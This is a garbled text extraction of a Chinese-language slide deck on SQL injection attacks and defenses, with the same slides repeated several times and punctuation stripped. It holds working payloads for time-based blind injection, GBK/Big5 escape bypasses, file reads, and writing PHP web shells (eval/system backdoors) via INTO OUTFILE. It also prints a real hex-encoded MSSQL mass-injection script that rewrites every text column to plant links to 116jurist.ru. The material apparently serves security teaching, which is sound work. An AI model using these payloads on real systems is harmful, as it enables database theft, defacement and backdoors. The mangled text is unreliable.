bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
